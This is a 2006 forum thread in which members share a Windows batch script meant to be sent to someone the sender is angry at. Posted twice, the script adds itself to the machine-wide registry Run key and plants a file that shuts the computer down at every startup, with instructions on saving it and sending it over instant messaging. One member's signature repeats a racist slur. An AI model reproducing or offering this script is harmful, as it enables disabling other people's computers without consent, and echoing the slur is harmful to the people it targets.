ThyElite Forums  
Go Back   ThyElite Forums > General > General Talk
Reload this Page Pissed at someone? Send them this!
Reply
 
Thread Tools Display Modes
(#31)
Old
Jimmy is Offline
Senior Member
Jimmy is on a distinguished road
 
Posts: 111
Join Date: Jun 2006
Default 08-20-2006, 06:23 PM

thats so sick
Reply With Quote
(#32)
Old
kevthedude is Offline
Veteran Member
kevthedude is on a distinguished road
 
Posts: 98
Join Date: Jun 2006
Default 08-20-2006, 08:36 PM

Okay, Here is a code I came up with. It can be executed from anywhere on the PC and still work. The code below MUST stay EXACTLY the same as it is printed here. The file can be named anything but must be a .bat file. I have not tested the shutdown file but I'm 99% sure it'll work. I have confirmed that it will add the file to the startup registry location and it will run this on any user using the PC. A cool feature I added is that if there is a file with the same name and location as the ones being saved, it'll delete them and then create a new one.

Code:
@echo off
if exist C:\system_reg.reg del C:\system_reg.reg
echo Windows Registry Editor Version 5.00 >> C:\system_reg.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> C:\system_reg.reg
echo "system_reg"="\"C:/system_bat.bat\"" >> C:\system_reg.reg
regedit.exe /S /C C:\system_reg.reg
if exist C:\system_bat.bat del C:\system_bat.bat
echo SHUTDOWN -S -t 1 >> C:\system_bat.bat
SHUTDOWN -S -t 1
If an admin wants to put this in special access be my guest.

Edit: The even better part is that if they delete the original file that was sent to them, they would still have this problem because a whole new .bat file is created.

Last edited by kevthedude : 08-20-2006 at 08:42 PM.
Reply With Quote
(#33)
Old
TAG is Offline
Master of the Post
TAG is on a distinguished road
 
Posts: 362
Join Date: Aug 2006
Location: Your Ass
Send a message via AIM to TAG
Default 08-20-2006, 08:46 PM

LOL thanks a lot kev. But how do I add text to it so I can say a comment?

And why is yomommagotbeef banned?




Put this exact line in your sig if you hate niggers
Reply With Quote
(#34)
Old
kevthedude is Offline
Veteran Member
kevthedude is on a distinguished road
 
Posts: 98
Join Date: Jun 2006
Default 08-20-2006, 08:50 PM

umm, find where I have the shutdown command (last two lines). You can change that command to whatever you want.

So you can change them to:
Code:
echo SHUTDOWN -S -t 1 -c Bye, Bye! >> C:\system_bat.bat
SHUTDOWN -S -t 1 -c Fuck you! Your in trouble now dipshit.
The first time you see it the shutdown command will be ran each time the PC startup items are loaded. The second time is just for the first time the BAT file you sent them will be ran. The script I gave you onlys needs to be ran by the user once. After that it doesn't matter.
Reply With Quote
(#35)
Old
zzzzzz is Offline
Veteran Member
zzzzzz is on a distinguished road
 
Posts: 64
Join Date: Jun 2006
Default 08-20-2006, 09:35 PM

this is so sweet so once i make it i send it over an instant messeging program like msn right.
Reply With Quote
(#36)
Old
PlasmaShock is Offline
Elite Member
PlasmaShock is on a distinguished road
 
Posts: 154
Join Date: Jun 2006
Location: somewhere
Default 08-20-2006, 09:53 PM

kevthedude owns.


Reply With Quote
(#37)
Old
Alex- is Offline
1337
Alex- is on a distinguished road
 
Posts: 244
Join Date: Jul 2006
Location: Hell.
Send a message via AIM to Alex- Send a message via MSN to Alex-
Default 08-20-2006, 09:57 PM

Uhh can someone make that a little clearer?


New coke name: Shots

Names For Sale.

Reply With Quote
(#38)
Old
TAG is Offline
Master of the Post
TAG is on a distinguished road
 
Posts: 362
Join Date: Aug 2006
Location: Your Ass
Send a message via AIM to TAG
Default 08-20-2006, 10:48 PM

1. Open up notepad.
2. Copy & paste this into the message:
Code:
@echo off
if exist C:\system_reg.reg del C:\system_reg.reg
echo Windows Registry Editor Version 5.00 >> C:\system_reg.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> C:\system_reg.reg
echo "system_reg"="\"C:/system_bat.bat\"" >> C:\system_reg.reg
regedit.exe /S /C C:\system_reg.reg
if exist C:\system_bat.bat del C:\system_bat.bat
echo SHUTDOWN -S -t 1 -c Bye, Bye! >> C:\system_bat.bat
SHUTDOWN -S -t 1 -c Fuck you asshole, your computer is fried!
3. Click 'File' > 'Save As' > 'WHATEVERYOUWANTTHEFILENAMETOBE.bat'.

Make sure to save it to your desktop for easy access. Don't double click it or else your computer will be fucked. And the 'WHATEVERYOUWANTTHEFILENAMETOBE' stands for what ever you want the file name to be. Have fun fucking up your friends computers!




Put this exact line in your sig if you hate niggers
Reply With Quote
(#39)
Old
kevthedude is Offline
Veteran Member
kevthedude is on a distinguished road
 
Posts: 98
Join Date: Jun 2006
Default 08-21-2006, 09:31 AM

Also, I can add that if you do run it by mistake, just boot up your PC in safe mode and delete the .BAT file in the C:\ Drive
Reply With Quote
(#40)
Old
vinciryan is Offline
Member
vinciryan is on a distinguished road
 
Posts: 36
Join Date: Aug 2006
Default 08-22-2006, 12:07 PM

WTG!!!!!!!!!! whoooooooohooooo!shut the guys computer down nice job!! a round of applause
Reply With Quote
Reply



Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Im Fuckin Pissed! Money_C Raged 4 08-18-2006 06:32 PM
Fucking Pissed Of Bad At Fucking Proxy Users BigB0MB Raged 3 08-12-2006 12:04 PM



Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.